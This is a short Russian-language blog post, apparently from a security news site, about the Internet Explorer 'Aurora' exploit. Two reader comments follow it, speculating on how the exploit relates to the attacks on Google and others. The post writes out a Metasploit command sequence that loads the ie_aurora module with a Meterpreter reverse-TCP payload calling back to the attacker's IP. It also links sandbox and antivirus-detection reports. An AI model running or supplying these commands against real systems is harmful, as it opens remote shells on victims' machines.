Сейчас эксплойт уже доступен в составе баз Metasploit и доступен к использованию:
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
На сам сплойт можно посмотреть здесь.
Вот подробное видео с иллюстрацией его работы:
The "Aurora" IE Exploit in Action from The Crew of Praetorian Prefect on Vimeo.
Результаты анализа боевого сплойта в песочнице Wepawet: http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js
Что-то не много его антивирусов на сегодняшний день детектит: http://www.virustotal.com/analisis/0793e8d10671762492091a9332b13321437977965e718761f5ef2c2ef298464a-1263646443
Update:
Код эксплойта на python
Update2:
Видео с работой эксплойта под разными версиями браузера IE (6/7/8) на XP c SP3:
Internet Exporer 6
Internet Exporer 7
Internet Exporer 8
Мне кажется, что эксплойт для IE ко всем этим атакам на компании или притянут за уши, или в открытый доступ выложили ну оччень сильно порезанную версию оного. Алсо, есть ещё вариант что Google, Adobe, итд. попали под раздачу случайно :)
ОтветитьУдалитьУ меня тоже есть такое ощущение, вообще история такая мутная, что я про нее даже упоминать не стал :) Сам пока не сформировал окончательно свою точку зрения на эти события.
ОтветитьУдалитьНасчет порезанной версии сплойта вполне может быть, он довольно забавный (тот что не в составе Metasploit).